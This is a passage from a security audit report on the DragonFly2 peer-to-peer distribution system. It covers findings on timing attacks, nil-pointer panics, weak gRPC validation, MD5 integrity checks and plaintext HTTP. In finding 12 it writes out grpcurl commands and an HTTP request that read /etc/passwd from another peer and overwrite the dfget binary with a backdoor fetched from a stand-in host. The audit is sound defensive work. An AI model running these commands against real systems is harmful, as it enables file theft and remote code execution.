os.OpenFile(t.DataFilePath, os.O_RDWR, defaultFileMode) \n if err != nil { \n return 0 , err \n } \n defer file.Close() \n Figure 7.1: Part of the localTaskStore.WritePiece method \n ( Dragonfly2/client/daemon/storage/local_storage.go#124–128 ) \n The bug occurs in multiple locations throughout the codebase. \n Exploit Scenario \n The server on which the DragonFly2 application runs has a disk that periodically fails to \n flush content due to a hardware failure. As a result, certain methods in the codebase \n sometimes fail to write content to disk. This causes undefined behavior. \n Recommendations \n Short term, consider closing files explicitly at the end of functions and checking for errors. \n Alternatively, defer a wrapper function to close the file and check for errors if applicable. \n Long term, test the DragonFly2 system with “failure injection” technique. This technique \n works by randomly failing system-level calls (like the one responsible for writing a file to a \n disk) and checking if the application under test correctly handles the error. \n References \n ● \"Don't defer Close() on writable files\" blog post \n Trail of Bits 32 DragonFly2 Security Assessment \n P U B L I C \n ● “Security assessment techniques for Go projects”, Fault injection chapter \n Trail of Bits 33 DragonFly2 Security Assessment \n P U B L I C \n 8. Timing attacks against Proxy’s basic authentication are possible \n Severity: Undetermined Difficulty: High \n Type: Timing Finding ID: TOB-DF2-8 \n Target: Dragonfly2/client/daemon/proxy/proxy.go \n Description \n The access control mechanism for the Proxy feature uses simple string comparisons and is \n therefore vulnerable to timing attacks. An attacker may try to guess the password one \n character at a time by sending all possible characters to a vulnerable mechanism and \n measuring the comparison instruction’s execution times. \n The vulnerability is shown in figure 8.1, where both the username and password are \n compared with a short-circuiting equality operation. \n if user != proxy.basicAuth.Username || pass != proxy.basicAuth.Password { \n Figure 8.1: Part of the ServeHTTP method with code line vulnerable to the timing attack \n ( Dragonfly2/client/daemon/proxy/proxy.go#316 ) \n It is currently undetermined what an attacker may be able to do with access to the proxy \n password. \n Recommendations \n Short term, replace the simple string comparisons used in the ServeHTTP method with \n constant-time comparisons. This will prevent the possibility of timing the comparison \n operation to leak passwords. \n Long term, use static analysis to detect code vulnerable to simple timing attacks. For \n example, use the CodeQL’s go/timing-attack query . \n References \n ● Timeless Timing Attacks : this presentation explains how timing attacks can be made \n more efficient. \n ● Go crypto/subtle ConstantTimeCompare method : this method implements a \n constant-time comparison. \n Trail of Bits 34 DragonFly2 Security Assessment \n P U B L I C \n 9. Possible panics due to nil pointer dereference when using variables created \n alongside an error \n Severity: Medium Difficulty: Medium \n Type: Denial of Service Finding ID: TOB-DF2-9 \n Target: Dragonfly2/client/daemon/rpcserver/rpcserver.go, \n Dragonfly2/client/daemon/peer/peertask_manager.go \n Description \n We found two instances in the DragonFly codebase where the first return value of a \n function is dereferenced even when the function returns an error (figures 9.1 and 9.2). This \n can result in a nil dereference, and cause code to panic . The codebase may contain \n additional instances of the bug. \n request, err := source.NewRequestWithContext(ctx, parentReq.Url, \n parentReq.UrlMeta.Header) \n if err != nil { \n log.Errorf( \"generate url [%v] request error: %v\" , request.URL, err) \n span.RecordError(err) \n return err \n } \n Figure 9.1: If there is an error, the request.URL variable is used even if the request is nil \n ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#621–626 ) \n prefetch, err := ptm.getPeerTaskConductor(context.Background(), taskID, req, limit, \n nil , nil , desiredLocation, false ) \n if err != nil { \n logger.Errorf( \"prefetch peer task %s/%s error: %s\" , prefetch.taskID, \n prefetch.peerID, err) \n return nil \n } \n Figure 9.2: prefetch may be nil when there is an error, and trying to get prefetch.taskID \n can cause a nil dereference panic \n ( Dragonfly2/client/daemon/peer/peertask_manager.go#294–298 ) \n Exploit Scenario \n Eve is a malicious actor operating a peer machine. She sends a dfdaemonv1.DownRequest \n request to her peer Alice. Alice’s machine receives the request, resolves a nil variable in \n the server.Download method, and panics. \n Trail of Bits 35 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, change the error message code to avoid making incorrect dereferences. \n Long term, review codebase against this type of issue. Systematically use static analysis to \n detect this type of vulnerability. For example, use Trail of Bits’ Semgrep \n invalid-usage-of-modified-variable rule . \n Trail of Bits 36 DragonFly2 Security Assessment \n P U B L I C \n 10. TrimLeft is used instead of TrimPrefix \n Severity: Informational Difficulty: Low \n Type: Data Validation Finding ID: TOB-DF2-10 \n Target: Various locations \n Description \n The strings.TrimLeft function is used at multiple points in the Dragonfly codebase to \n remove a prefix from a string. This function has unexpected behavior; its second argument \n is an unordered set of characters to remove, rather than a prefix to remove. The \n strings.TrimPrefix function should be used instead. \n The issues that were found are presented in figures 10.1–4. However, the codebase may \n contain additional issues of this type. \n urlMeta.Range = strings.TrimLeft(r, http.RangePrefix) \n Figure 10.1: Dragonfly2/scheduler/job/job.go#175 \n rg = strings.TrimLeft(r, \"bytes=\" ) \n Figure 10.2: Dragonfly2/client/dfget/dfget.go#226 \n urlMeta.Range = strings.TrimLeft(rangeHeader, \"bytes=\" ) \n Figure 10.3: Dragonfly2/client/daemon/objectstorage/objectstorage.go#288 \n meta.Range = strings.TrimLeft(rangeHeader, \"bytes=\" ) \n Figure 10.4: Dragonfly2/client/daemon/transport/transport.go#264 \n Figure 10.5 shows an example of the difference in behavior between strings.TrimLeft \n and strings.TrimPrefix : \n strings.TrimLeft( \"bytes=bbef02\" , \"bytes=\" ) == \"f02\" \n strings.TrimPrefix( \"bytes=bbef02\" , \"bytes=\" ) == \"bbef02\" \n Figure 10.5: difference in behavior between strings.TrimLeft and strings.TrimPrefix \n The finding is informational because we were unable to determine an exploitable attack \n scenario based on the vulnerability. \n Trail of Bits 37 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, replace incorrect calls to string.TrimLeft method with calls to \n string.TrimPrefix . \n Long term, test DragonFly2 functionalities against invalid and malformed data, such HTTP \n headers that do not adhere to the HTTP specification. \n Trail of Bits 38 DragonFly2 Security Assessment \n P U B L I C \n 11. Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not thread \n safe \n Severity: Undetermined Difficulty: High \n Type: Timing Finding ID: TOB-DF2-11 \n Target: Dragonfly2/pkg/graph/dag/vertex.go \n Description \n The Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not thread \n safe, and may cause inconsistent states if they are called at the same time as other \n functions. \n Figure 11.1 shows implementation of the Vertex.DeleteInEdges function. \n // DeleteInEdges deletes inedges of vertex. \n func (v *Vertex[T]) DeleteInEdges() { \n for _, parent := range v.Parents.Values() { \n parent.Children.Delete(v) \n } \n v.Parents = set.NewSafeSet[*Vertex[T]]() \n } \n Figure 11.1: The Vertex.DeleteInEdges method \n ( Dragonfly2/pkg/graph/dag/vertex.go#54–61 ) \n The for loop iterates through the vertex’s parents, deleting the corresponding entry in \n their Children sets. After the for loop, the vertex’s Parents set is assigned to be the \n empty set. However, if a parent is added to the vertex (on another thread) in between \n these two operations, the state will be inconsistent. The parent will have the vertex in its \n Children set, but the vertex will not have the parent in its Parents set. \n The same problem happens in Vertex.DeleteOutEdges method, since its code is \n essentially the same, but with Parents swapped with Children in all occurrences. \n It is undetermined what exploitable problems this bug can cause. \n Recommendations \n Short term, give Vertex.DeleteInEdges and Vertex.DeleteOutEdges methods access \n to the DAG ’s mutex, and use mu.Lock to prevent other threads from accessing the DAG \n while Vertex.DeleteInEdges or Vertex.DeleteOutEdges is in progress. \n Trail of Bits 39 DragonFly2 Security Assessment \n P U B L I C \n Long term, consider writing randomized stress tests for these sorts of bugs; perform many \n writes concurrently, and see if any data races or invalid states occur. \n References \n ● Documentation on golang’s data race detector \n Trail of Bits 40 DragonFly2 Security Assessment \n P U B L I C \n 12. Arbitrary file read and write on a peer machine \n Severity: High Difficulty: Low \n Type: Data Validation Finding ID: TOB-DF2-12 \n Target: Various locations \n Description \n A peer exposes the gRPC API and HTTP API for consumption by other peers. These APIs \n allow peers to send requests that force the recipient peer to create files in arbitrary file \n system locations, and to read arbitrary files. This allows peers to steal other peers’ secret \n data and to gain remote code execution (RCE) capabilities on the peer’s machine. \n The gRPC API has, among others, the ImportTask and ExportTask endpoints (figure \n 12.1). The first endpoint copies the file specified in the path argument (figures 12.2 and \n 12.3) to a directory pointed by the dataDir configuration variable (e.g., \n /var/lib/dragonfly ). \n // Daemon Client RPC Service \n service Daemon{ \n [skipped] \n // Import the given file into P2P cache system \n rpc ImportTask(ImportTaskRequest) returns (google.protobuf.Empty); \n // Export or download file from P2P cache system \n rpc ExportTask(ExportTaskRequest) returns (google.protobuf.Empty); \n [skipped] \n } \n Figure 12.1: Definition of the gRPC API exposed by a peer \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#113–131 ) \n message ImportTaskRequest { \n // Download url. \n string url = 1 [(validate.rules). string .min_len = 1 ]; \n // URL meta info. \n common.UrlMeta url_meta = 2 ; \n // File to be imported. \n string path = 3 [(validate.rules). string .min_len = 1 ]; \n // Task type. \n common.TaskType type = 4 ; \n } \n Figure 12.2: Arguments for the ImportTask endpoint \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#76–85 ) \n Trail of Bits 41 DragonFly2 Security Assessment \n P U B L I C \n file, err := os.OpenFile(t.DataFilePath, os.O_RDWR, defaultFileMode) \n if err != nil { \n return 0 , err \n } \n defer file.Close() \n if _, err = file.Seek(req.Range.Start, io.SeekStart); err != nil { \n return 0 , err \n } \n n, err := io.Copy(file, io.LimitReader(req.Reader, req.Range.Length)) \n Figure 12.3: Part of the WritePiece method (called by the handler of the ImportTask \n endpoint) that copies the content of a file \n ( Dragonfly2/client/daemon/storage/local_storage.go#124–133 ) \n The second endpoint moves the previously copied file to a location provided by the output \n argument (figures 12.4 and 12.5). \n message ExportTaskRequest { \n // Download url. \n string url = 1 [(validate.rules). string .min_len = 1 ]; \n // Output path of downloaded file. \n string output = 2 [(validate.rules). string .min_len = 1 ]; \n [skipped] \n } \n Figure 12.4: Arguments for the ExportTask endpoint \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#87–104 ) \n dstFile, err := os.OpenFile(req.Destination, os.O_CREATE|os.O_RDWR|os.O_TRUNC, \n defaultFileMode) \n if err != nil { \n t.Errorf( \"open tasks destination file error: %s\" , err) \n return err \n } \n defer dstFile.Close() \n // copy_file_range is valid in linux \n // https://go-review.googlesource.com/c/go/+/229101/ \n n, err := io.Copy(dstFile, file) \n Figure 12.5: Part of the Store method (called by the handler of the ExportTask endpoint) that \n copies the content of a file; req.Destination equals the output argument \n ( Dragonfly2/client/daemon/storage/local_storage.go#396–404 ) \n The HTTP API, called Upload Manager, exposes the /download/:task_prefix/:task_id \n endpoint. This endpoint can be used to read a file that was previously imported with the \n relevant gRPC API call. \n Trail of Bits 42 DragonFly2 Security Assessment \n P U B L I C \n Exploit Scenario \n Alice (a peer in a DragonFly2 system) wants to steal the /etc/passwd file from Bob \n (another peer). Alice uses the command shown in figure 12.6 to make Bob import the file to \n a dataDir directory. \n grpcurl -plaintext -format json -d \\ \n '{\"url\":\"http://example.com\", \"path\":\"/etc/passwd\", \"urlMeta\":{\"digest\": \n \"md5:aaaff\", \"tag\":\"tob\"}}'$ BOB_IP:65000 dfdaemon.Daemon.ImportTask \n Figure 12.6: Command to steal /etc/passwd \n Next, she sends an HTTP request, similar to the one in figure 12.7, to Bob. Bob returns the \n content of his /etc/passwd file. \n GET /download/<prefix>/<sha256>?peerId=172.17.0.1-1-<tag> HTTP / 1.1 \n Host: $BOB_IP:55002 \n Range: bytes=0-100 \n Figure 12.7: Bob’s response, revealing /etc/passwd contents \n Later, Alice uploads a malicious backdoor executable to the peer-to-peer network. Once \n Bob has downloaded (e.g., via the exportFromPeers method) and cached the backdoor \n file, Alice sends a request like the one shown in figure 12.8 to overwrite the \n /opt/dragonfly/bin/dfget binary with the backdoor. \n grpcurl -plaintext -format json -d \\ \n '{\"url\":\"http://alice.com/backdoor\", \"output\":\"/opt/dragonfly/bin/dfget\", \n \"urlMeta\":{\"digest\": \"md5:aaaff\", \"tag\":\"tob\"}}' $BOB_IP:65000 \n dfdaemon.Daemon.ExportTask \n Figure 12.8: Command to overwrite dfget binary \n After some time Bob restarts the dfget daemon, which executes Alice’s backdoor on his \n machine. \n Recommendations \n Short term, sandbox the DragonFly2 daemon, so that it can access only files within a \n certain directory. Mitigate path traversal attacks. Ensure that APIs exposed by peers cannot \n be used by malicious actors to gain arbitrary file read or write, code execution, HTTP \n request forgery, and other unintended capabilities. \n Trail of Bits 43 DragonFly2 Security Assessment \n P U B L I C \n 13. Manager generates mTLS certificates for arbitrary IP addresses \n Severity: High Difficulty: Low \n Type: Authentication Finding ID: TOB-DF2-13 \n Target: Dragonfly2/manager/rpcserver/security_server_v1.go \n Description \n A peer can obtain a valid TLS certificate for arbitrary IP addresses, effectively rendering the \n mTLS authentication useless. The issue is that the Manager’s Certificate gRPC service \n does not validate if the requested IP addresses “belong to” the peer requesting the \n certificate—that is, if the peer connects from the same IP address as the one provided in \n the certificate request. \n Please note that the issue is known to developers and marked with TODO comments, as \n shown in figure 13.1. \n if addr, ok := p.Addr.(*net.TCPAddr); ok { \n ip = addr.IP.String() \n } else { \n ip, _, err = net.SplitHostPort(p.Addr.String()) \n if err != nil { \n return nil , err \n } \n } \n // Parse csr. \n [skipped] \n // Check csr signature. \n // TODO check csr common name and so on. \n if err = csr.CheckSignature(); err != nil { \n return nil , err \n } \n [skipped] \n // TODO only valid for peer ip \n // BTW we need support both of ipv4 and ipv6. \n ips := csr.IPAddresses \n if len (ips) == 0 { \n // Add default connected ip. \n ips = []net.IP{net.ParseIP(ip)} \n } \n Figure 13.1: The Manager’s Certificate gRPC handler for the IssueCertificate endpoint \n ( Dragonfly2/manager/rpcserver/security_server_v1.go#65–98 ) \n Trail of Bits 44 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, implement the missing IP addresses validation in the IssueCertificate \n endpoint of the Manager’s Certificate gRPC service. Ensure that a peer cannot obtain a \n certificate with an ID that does not belong to the peer. \n Long term, research common security problems in PKI infrastructures and ensure that \n DragonFly2’s PKI does not have them. Ensure that if a peer IP address changes, the \n certificates issued for that IP are revoked. \n Trail of Bits 45 DragonFly2 Security Assessment \n P U B L I C \n 14. gRPC requests are weakly validated \n Severity: Undetermined Difficulty: Low \n Type: Data Validation Finding ID: TOB-DF2-14 \n Target: DragonFly2 \n Description \n The gRPC requests are weakly validated, and some requests’ fields are not validated at all. \n For example, the ImportTaskRequest ’s url_meta field is not validated and may be \n missing from a request (see figure 14.1). Sending requests to the ImportTask endpoint (as \n shown in figure 14.2) triggers the code shown in figure 14.3. The highlighted call to the \n logger accesses the req.UrlMeta.Tag variable, causing a nil dereference panic (because \n the req.UrlMeta variable is nil ). \n message ImportTaskRequest { \n // Download url. \n string url = 1 [(validate.rules). string .min_len = 1 ]; \n // URL meta info. \n common.UrlMeta url_meta = 2 ; \n // File to be imported. \n string path = 3 [(validate.rules). string .min_len = 1 ]; \n // Task type. \n common.TaskType type = 4 ; \n } \n Figure 14.1: ImportTaskRequest definition, with the url_meta field missing any validation \n rules \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#76–85 ) \n grpcurl -plaintext -format json -d \\ \n '{\"url\":\"http://example.com\", \"path\":\"x\"}' $PEER_IP:65000 dfdaemon.Daemon.ImportTask \n Figure 14.2: An example command that triggers panic in the daemon gRPC server \n s.Keep() \n peerID := idgen.PeerIDV1(s.peerHost.Ip) \n taskID := idgen.TaskIDV1(req.Url, req.UrlMeta) \n log := logger.With( \"function\" , \"ImportTask\" , \"URL\" , req.Url, \"Tag\" , req.UrlMeta.Tag, \n \"taskID\" , taskID, \"file\" , req.Path) \n Figure 14.3: The req.UrlMeta variable may be nil \n ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#871–874 ) \n Trail of Bits 46 DragonFly2 Security Assessment \n P U B L I C \n Another example of weak validation can be observed in the definition of the UrlMeta \n request (figure 14.4). The digest field of the request should contain a prefix followed by \n an either MD5 or SHA256 hex-encoded hash. While prefix and hex-encoding is validated, \n length of the hash is not. The length is validated only during the parsing . \n // UrlMeta describes url meta info. \n message UrlMeta { \n // Digest checks integrity of url content, for example md5:xxx or sha256:yyy. \n string digest = 1 [(validate.rules). string = {pattern: \n \"^(md5)|(sha256):[A-Fa-f0-9]+$\" , ignore_empty: true }]; \n Figure 14.4: The UrlMeta request definition, with a regex validation of the digest field \n ( api/pkg/apis/common/v1/common.proto#163–166 ) \n Recommendations \n Short term, add missing validations for the ImportTaskRequest and UrlMeta messages. \n Centralize validation of external inputs, so that it is easy to understand what properties are \n enforced on the data. Validate data as early as possible (for example, in the proto-related \n code). \n Long term, use fuzz testing to detect missing validations. \n Trail of Bits 47 DragonFly2 Security Assessment \n P U B L I C \n 15. Weak integrity checks for downloaded files \n Severity: High Difficulty: Medium \n Type: Data Validation Finding ID: TOB-DF2-15 \n Target: DragonFly2 \n Description \n The DragonFly2 uses a variety of hash functions, including the MD5 hash. This algorithm \n does not provide collision resistance; it is secure only against preimage attacks. While these \n security guarantees may be enough for the DragonFly2 system, it is not completely clear if \n there are any scenarios where lack of the collision resistance would compromise the \n system. There are no clear benefits to keeping the MD5 hash function in the system. \n Figure 15.1 shows the core validation method that protects the integrity of files \n downloaded from the peer-to-peer network. As shown in the figure, the hash of a file \n (sha256) is computed over hashes of all file’s pieces (MD5). So the security provided by the \n more secure sha256 hash is lost, because of use of the MD5. \n var pieceDigests [] string \n for i := int32 ( 0 ); i < t.TotalPieces; i++ { \n pieceDigests = append (pieceDigests, t.Pieces[i].Md5) \n } \n digest := digest.SHA256FromStrings(pieceDigests...) \n if digest != t.PieceMd5Sign { \n t.Errorf( \"invalid digest, desired: %s, actual: %s\" , t.PieceMd5Sign, digest) \n t.invalid.Store( true ) \n return ErrInvalidDigest \n } \n Figure 15.1: Part of the method responsible for validation of files’ integrity \n ( Dragonfly2/client/daemon/storage/local_storage.go#255–265 ) \n The MD5 algorithm is hard coded over the entire codebase (e.g., figure 15.2), but in some \n places the hash algorithm is configurable (e.g., figure 15.3). Further investigation is required \n to determine whether an attacker can exploit the configurability of the system to perform \n downgrade attacks—that is, to downgrade the security of the system by forcing users to \n use the MD5 algorithm, even when a more secure option is available. \n reader, err = digest.NewReader( digest.AlgorithmMD5 , io.LimitReader(resp.Body, \n int64 (req.piece.RangeSize)), digest.WithEncoded(req.piece.PieceMd5), \n Trail of Bits 48 DragonFly2 Security Assessment \n P U B L I C \n digest.WithLogger(req.log)) \n Figure 15.2: Hardcoded hash function \n ( Dragonfly2/client/daemon/peer/piece_downloader.go#188 ) \n switch algorithm { \n case AlgorithmSHA1: \n if len (encoded) != 40 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n case AlgorithmSHA256: \n if len (encoded) != 64 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n case AlgorithmSHA512: \n if len (encoded) != 128 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n case AlgorithmMD5: \n if len (encoded) != 32 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n default : \n return nil , errors.New( \"invalid algorithm\" ) \n } \n Figure 15.3: User-configurable hash function \n ( Dragonfly2/pkg/digest/digest.go#111–130 ) \n Moreover, there are missing validations of the integrity hashes, for example in the \n ImportTask method (figure 15.5). \n // TODO: compute and check hash digest if digest exists in ImportTaskRequest \n Figure 15.4: Missing hash validation \n ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#904 ) \n Exploit Scenario \n Alice, a peer in the DragonFly2 system, creates two images: an innocent one, and one with \n malicious code. Both images consist of two pieces, and Alice generates the pieces so that \n their respective MD5 hashes collide (are the same). Therefore, the PieceMd5Sign \n metadata of both images are equal. Alice shares the innocent image with other peers, who \n attest to their validity (i.e., that it works as expected and is not malicious). Bob wants to \n download the image and requests it from the peer-to-peer network. After downloading the \n image, Bob checks its integrity with a SHA256 hash that is known to him. Alice, who is \n participating in the network, had already provided Bob the other image, the malicious one. \n Bob unintentionally uses the malicious image. \n Trail of Bits 49 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, remove support for the MD5. Always use SHA256, SHA3, or another secure \n hashing algorithm. \n Long term, take an inventory of all cryptographic algorithms used across the entire system. \n Ensure that no deprecated or non-recommended algorithms are used. \n Trail of Bits 50 DragonFly2 Security Assessment \n P U B L I C \n 16. Invalid error handling, missing return statement \n Severity: Informational Difficulty: Low \n Type: Error Reporting Finding ID: TOB-DF2-16 \n Target: Dragonfly2/pkg/source/transport_option.go, \n Dragonfly2/manager/service/preheat.go \n Description \n There are two instances of a missing return statement inside an if branch that handles \n an error from a downstream method. \n The first issue is in the UpdateTransportOption function, where failed parsing of the \n Proxy option prints an error, but does not terminate execution of the \n UpdateTransportOption function. \n func UpdateTransportOption(transport *http.Transport, optionYaml [] byte ) error { \n [skipped] \n if len (opt.Proxy) > 0 { \n proxy, err := url.Parse(opt.Proxy) \n if err != nil { \n fmt.Printf( \"proxy parse error: %s\\n\" , err) \n } \n transport.Proxy = http.ProxyURL(proxy) \n } \n Figure 16.1: the UpdateTransportOption function \n ( Dragonfly2/pkg/source/transport_option.go#45–58 ) \n The second issue is in the GetV1Preheat method, where failed parsing of the rawID \n argument does not result in termination of the method execution. Instead, the id variable \n will be assigned either the zero or max_uint value. \n func (s *service) GetV1Preheat(ctx context.Context, rawID string ) \n (*types.GetV1PreheatResponse, error ) { \n id, err := strconv.ParseUint(rawID, 10 , 32 ) \n if err != nil { \n logger.Errorf( \"preheat convert error\" , err) \n } \n Figure 16.2: the GetV1Preheat function \n ( Dragonfly2/manager/service/preheat.go#66–70 ) \n Trail of Bits 51 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, add the missing return statements in the UpdateTransportOption method. \n Long term, use static analysis to detect similar bugs. \n Trail of Bits 52 DragonFly2 Security Assessment \n P U B L I C \n 17. Tiny file download uses hard coded HTTP protocol \n Severity: High Difficulty: High \n Type: Configuration Finding ID: TOB-DF2-17 \n Target: DragonFly2 \n Description \n The code in the scheduler for downloading a tiny file is hard coded to use the HTTP \n protocol, rather than HTTPS. This means that an attacker could perform a \n Man-in-the-Middle attack, changing the network request so that a different piece of data \n gets downloaded. Due to the use of weak integrity checks ( TOB-DF2-15 ), this modification \n of the data may go unnoticed. \n // DownloadTinyFile downloads tiny file from peer without range. \n func (p *Peer) DownloadTinyFile() ([] byte , error ) { \n ctx, cancel := context.WithTimeout(context.Background(), \n downloadTinyFileContextTimeout) \n defer cancel() \n // Download url: \n http://${host}:${port}/download/${taskIndex}/${taskID}?peerId=${peerID} \n targetURL := url.URL{ \n Scheme: \"http\" , \n Host: fmt.Sprintf( \"%s:%d\" , p.Host.IP, p.Host.DownloadPort), \n Path: fmt.Sprintf( \"download/%s/%s\" , p.Task.ID[: 3 ], p.Task.ID), \n RawQuery: fmt.Sprintf( \"peerId=%s\" , p.ID), \n } \n Figure 17.1: Hard-coded use of HTTP \n ( Dragonfly2/scheduler/resource/peer.go#435–446 ) \n Exploit Scenario \n A network-level attacker who cannot join a peer-to-peer network performs a \n Man-in-the-Middle attack on peers. The adversary can do this because peers (partially) \n communicate over plaintext HTTP protocol. The attack chains this vulnerability with the one \n described in TOB-DF2-15 to replace correct files with malicious ones. Unconscious peers \n use the malicious files. \n Recommendations \n Short term, add a configuration option to use HTTPS for these downloads. \n Long term, audit the rest of the repository for other hard-coded uses of HTTP. \n Trail of Bits 53 DragonFly2 Security Assessment \n P U B L I C \n 18. Incorrect log message \n Severity: Informational Difficulty: Low \n Type: Auditing and Logging Finding ID: TOB-DF2-18 \n Target: Dragonfly2/scheduler/service/service_v1.go \n Description \n The scheduler service may sometimes output two different logging messages stating two \n different reasons why a task is being registered as a normal task. \n The following code is used to register a peer and trigger a seed peer download task. \n // RegisterPeerTask registers peer and triggers seed peer download task. \n func (v *V1) RegisterPeerTask(ctx context.Context, req *schedulerv1.PeerTaskRequest) \n (*schedulerv1.RegisterResult, error ) { \n [skipped] \n // The task state is TaskStateSucceeded and SizeScope is not invalid. \n switch sizeScope { \n case commonv1.SizeScope_EMPTY: \n [skipped] \n case commonv1.SizeScope_TINY: \n // Validate data of direct piece. \n if !peer.Task.CanReuseDirectPiece() { \n peer.Log.Warnf( \"register as normal task, because of length of \n direct piece is %d, content length is %d\" , \n len (task.DirectPiece), task.ContentLength.Load()) \n break \n } \n result, err := v.registerTinyTask(ctx, peer) \n if err != nil { \n peer.Log.Warnf( \"register as normal task, because of %s\" , \n err.Error()) \n break \n } \n return result, nil \n case commonv1.SizeScope_SMALL: \n result, err := v.registerSmallTask(ctx, peer) \n if err != nil { \n peer.Log.Warnf( \"register as normal task, because of %s\" , \n Trail of Bits 54 DragonFly2 Security Assessment \n P U B L I C \n err.Error()) \n break \n } \n return result, nil \n } \n result, err := v.registerNormalTask(ctx, peer) \n if err != nil { \n peer.Log.Error(err) \n v.handleRegisterFailure(ctx, peer) \n return nil , dferrors.New(commonv1.Code_SchedError, err.Error()) \n } \n peer.Log.Info( \"register as normal task, because of invalid size scope\" ) \n return result, nil \n } \n Figure 18.1: Code snippet with incorrect logging \n ( Dragonfly2/scheduler/service/service_v1.go#93–173 ) \n Each of the highlighted sets of lines above print “register as normal task, because [reason],” \n before exiting from the switch statement. Then, the task is registered as a normal task. \n Finally, another message is logged: “register as normal task, because of invalid size scope.” \n This means that two different messages may be printed (one as a warning message, one as \n an informational message) with two contradicting reasons for why the task was registered \n as a normal task. \n This does not cause any security problems directly but may lead to difficulties while \n managing a DragonFly system or debugging DragonFly code. \n Recommendations \n Short term, move the peer.Log.Info function call into a default branch in the switch \n statement so that it is called only when the size scope is invalid. \n Trail of Bits 55 DragonFly2 Security Assessment \n P U B L I C \n 19. Usage of architecture-dependent int type \n Severity: Informational Difficulty: Low \n Type: Data Validation Finding ID: TOB-DF2-19 \n Target: Dragonfly2 \n Description \n The DragonFly2 uses int and uint numeric types in its golang codebase. These types’ bit \n sizes are either 32 or 64 bits, depending on the hardware where the code is executed. \n Because of that, DragonFly2 components running on different architectures may behave \n differently. These discrepancies in behavior may lead to unexpected crashes of some \n components or incorrect data handling. \n For example, the handlePeerSuccess method casts peer.Task.ContentLength \n variable to the int type. Schedulers running on different machines may behave differently, \n because of this behavior. \n if len (data) != int (peer.Task.ContentLength.Load()) { \n peer.Log.Errorf( \"download tiny task length of data is %d, task content length \n is %d\" , len (data), peer.Task.ContentLength.Load()) \n return \n } \n Figure 19.1: example use of architecture-dependent int type \n ( Dragonfly2/scheduler/service/service_v1.go#1240–1243 ) \n Recommendations \n Short term, use a fixed bit size for all integer values. Alternatively, ensure that using the \n int type will not impact any computing where results must agree on all participants’ \n computers. \n Trail of Bits 56 DragonFly2 Security Assessment \n P U B L I C \n A. Vulnerability Categories \n The following tables describe the vulnerability categories, severity levels, and difficulty \n levels used in this document. \n Vulnerability Categories \n Category Description \n Access Controls Insufficient authorization or assessment of rights \n Auditing and Logging Insufficient auditing of actions or logging of problems \n Authentication Improper identification of users \n Configuration Misconfigured servers, devices, or software components \n Cryptography A breach of system confidentiality or integrity \n Data Exposure Exposure of sensitive information \n Data Validation Improper reliance on the structure or values of data \n Denial of Service A system failure with an availability impact \n Error Report ing Insecure or insufficient reporting of error conditions \n Patching Use of an outdated software package or library \n Session Management Improper identification of authenticated users \n Testing Insufficient test methodology or test coverage \n Timing Race conditions or other order-of-operations flaws \n Undefined Behavior Undefined behavior triggered within the system \n Trail of Bits 57 DragonFly2 Security Assessment \n P U B L I C \n Severity Levels \n Severity Description \n Inform ational The issue does not pose an immediate risk but is relevant to security best \n practices. \n Undetermined The extent of the risk was not determined during this engagement. \n Low The risk is small or is not one the client has indicated is important. \n Medium User information is at risk; exploitation could pose reputational, legal, or \n moderate financial risks. \n High The flaw could affect numerous users and have serious reputational, legal, \n or financial implications. \n Difficulty Levels \n Difficulty Description \n Undetermined The difficulty of exploitation was not determined during this engagement. \n Low The flaw is well known; public tools for its exploitation exist or can be \n scripted. \n Medium An attacker must write an exploit or will need in-depth knowledge of the \n system. \n High An attacker must have privileged access to the system, may need to know \n complex technical details, or must discover other weaknesses to exploit this \n issue. \n Trail of Bits 58 DragonFly2 Security Assessment \n P U B L I C \n B. Code Maturity Categories \n The following tables describe the code maturity categories and rating criteria used in this \n document. \n Code Maturity Categories \n Category Description \n Arithmetic The proper use of mathematical operations and semantics \n Auditing The use of event auditing and logging to support monitoring \n Authentication / \n Access Controls The use of robust access controls to handle identification and \n authorization and to ensure safe interactions with the system \n Complexity \n Management The presence of clear structures designed to manage system complexity, \n including the separation of system logic into clearly defined functions \n Configuration The configuration of system components in accordance with best \n practices \n Cryptography and \n Key Management The safe use of cryptographic primitives and functions, along with the \n presence of robust mechanisms for key generation and distribution \n Data Handling The safe handling of user inputs and data processed by the system \n Documentation The presence of comprehensive and readable codebase documentation \n Maintenance The timely maintenance of system components to mitigate risk \n Memory Safety \n and Error Handling The presence of memory safety and robust error-handling mechanisms \n Testing and \n Verification The presence of robust testing procedures (e.g., unit tests, integration \n tests, and verification methods) and sufficient test coverage \n Trail of Bits 59 DragonFly2 Security Assessment \n P U B L I C \n Rating Criteria \n Rating Description \n Strong No issues were found, and the system exceeds industry standards. \n Satisfactory Minor issues were found, but the system is compliant with best practices. \n Moderate Some issues that may affect system safety were found. \n Weak Many issues that affect system safety were found. \n Missing A required component is missing, significantly affecting system safety. \n Not Applicable The category is not applicable to this review. \n Not Considered The category was not considered in this review. \n Further \n Investigation \n Required Further investigation is required to reach a meaningful conclusion. \n Trail of Bits 60 DragonFly2 Security Assessment \n P U B L I C \n C. Code Quality Issues \n This appendix contains findings that do not have immediate or obvious security \n implications. However, they may facilitate exploit chains targeting other vulnerabilities or \n may become easily exploitable in future releases. \n 1. Redundant variable in loadLegacyGPRCTLSCredentials method. The \n mergedOptions string is never used. \n func loadLegacyGPRCTLSCredentials(opt config.SecurityOption, certifyClient \n *certify.Certify, security config.GlobalSecurityOption) \n (credentials.TransportCredentials, error ) { \n // merge all options \n var mergedOptions = security \n mergedOptions.CACert += 